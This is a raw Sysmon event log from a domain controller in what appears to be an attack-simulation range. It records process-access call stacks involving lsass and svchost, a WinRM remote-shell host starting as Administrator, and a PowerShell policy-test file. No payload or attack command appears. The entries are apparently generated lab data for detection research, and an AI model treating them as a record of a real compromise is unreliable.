08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.467{5D479F2C-1677-5F84-F602-000000007E01}1324C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.461{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.383{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.383{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.383{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.368{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.368{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.368{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.946{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.946{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.915{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_oeuhpdzq.sn0.ps12020-10-12 08:40:24.915 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.899{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1678-5F84-0103-000000007E01}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 